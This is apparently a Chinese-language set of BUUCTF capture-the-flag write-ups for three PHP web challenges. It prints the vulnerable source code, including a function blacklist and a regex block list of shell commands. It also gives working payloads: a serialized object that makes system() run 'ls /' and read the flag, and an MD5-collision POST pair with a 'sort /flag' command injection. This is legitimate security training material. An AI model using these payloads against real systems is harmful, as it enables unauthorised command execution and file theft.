1.BUUCTF刷题-[强网杯 2019]高明的黑客
1-1
下载源码打开看一下,有很多的shell,大多应该都是无用的。这道题需要写py脚本来找到能用的脚本。不过我连shell也看不太懂。
2.BUUCTF刷题-[网鼎杯 2020 朱雀组]phpweb
访问/index.php页面,查看post表单传参,发现func传了一个函数名,p传递参数,先尝试一下system函数。
2-1
应该是有过滤关键词,尝试用file_get_contents读一下源代码。
2-2
尝试分析一下源码。
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
//黑名单
function gettime($func, $p) {
$result = call_user_func($func, $p);
//第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。
$a= gettype($result);
if ($a == "string") {
return $result;
//结果为字符串时返回
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
//析构函数
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
//strtolower() 函数把字符串转换为小写。
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
可以考虑传入反序列化函数,然后用序列化内容完成注入。
构造序列化内容:
<?php
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
}
$p=new Test();
$p->func="system";
$p->p="ls /";//返回主目录信息
//$p->p="find / -name 'flag*'" 查找flag文件
echo serialize($p);
?>
传入的payload为:
O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
获得主目录,但是flag不在主目录下,接下来查找一下flag文件在哪,然后直接打印即可。
<?php
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
}
$p=new Test();
$p->func="system";
$p->p="cat $(find / -name flag*)";
echo serialize($p);
?>
3.BUUCTF刷题-[安洵杯 2019]easy_web
get表单中传递img和cmd两个参数,其中img默认参数给出。看了大佬的wp,线索在img里,看这字符的种类,应当是base64加密,用base64连续解密两次,得到"3535352e706e67",一串十六进制数,转成字符串为"555.png",这应该就是页面所显示图片的文件名。
对index.php进行上述加密过程,最后得到"TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"。用burp抓包可以看到源码的base64加密,进行解密就得到了源码。
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
绕过md5强判断,再传入没有被过滤的命令即可。
?cmd=sort%20/flag
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
